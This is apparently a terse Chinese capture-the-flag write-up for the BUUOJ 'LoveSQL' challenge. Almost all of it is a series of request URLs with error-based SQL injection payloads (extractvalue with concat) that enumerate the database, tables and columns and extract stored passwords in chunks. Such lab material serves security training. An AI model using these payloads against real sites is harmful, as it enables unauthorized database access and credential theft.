buuoj [极客大挑战 2019]LoveSQL

报错注入:

http://2c7ced76-2d5f-4690-bd62-4ca2c414de32.node3.buuoj.cn/check.php?username=admin' and extractvalue(1,concat(0x5c,(select  user()))) and '1&password=67df2765f3da545f03860281ef7f964d

http://2c7ced76-2d5f-4690-bd62-4ca2c414de32.node3.buuoj.cn/check.php?username=admin' and extractvalue(1,concat(0x5c,(select  database()))) and '1&password=67df2765f3da545f03860281ef7f964d

http://2c7ced76-2d5f-4690-bd62-4ca2c414de32.node3.buuoj.cn/check.php?username=admin' and extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema='geek'))) and '1&password=67df2765f3da545f03860281ef7f964d

http://2c7ced76-2d5f-4690-bd62-4ca2c414de32.node3.buuoj.cn/check.php?username=admin' and extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'))) and '1&password=67df2765f3da545f03860281ef7f964d

http://2c7ced76-2d5f-4690-bd62-4ca2c414de32.node3.buuoj.cn/check.php?username=admin' and extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'))) and '1&password=67df2765f3da545f03860281ef7f964d

http://2c7ced76-2d5f-4690-bd62-4ca2c414de32.node3.buuoj.cn/check.php?username=admin' and extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_name='geekuser'))) and '1&password=67df2765f3da545f03860281ef7f964d

http://2c7ced76-2d5f-4690-bd62-4ca2c414de32.node3.buuoj.cn/check.php?username=admin' and extractvalue(1,concat(0x5c,(select group_concat(password) from l0ve1ysq1))) and '1&password=67df2765f3da545f03860281ef7f964d

http://2c7ced76-2d5f-4690-bd62-4ca2c414de32.node3.buuoj.cn/check.php?username=admin' and extractvalue(1,concat(0x5c,(select group_concat(length(password)) from l0ve1ysq1 where id =16))) and '1&password=67df2765f3da545f03860281ef7f964d

http://2c7ced76-2d5f-4690-bd62-4ca2c414de32.node3.buuoj.cn/check.php?username=admin' and extractvalue(1,concat(0x5c,(select group_concat(substr(password,1,24)) from l0ve1ysq1 where id =16))) and '1&password=67df2765f3da545f03860281ef7f964d

http://2c7ced76-2d5f-4690-bd62-4ca2c414de32.node3.buuoj.cn/check.php?username=admin' and extractvalue(1,concat(0x5c,(select group_concat(substr(password,21,43)) from l0ve1ysq1 where id =16))) and '1&password=67df2765f3da545f03860281ef7f964d


你可能感兴趣的:(Web)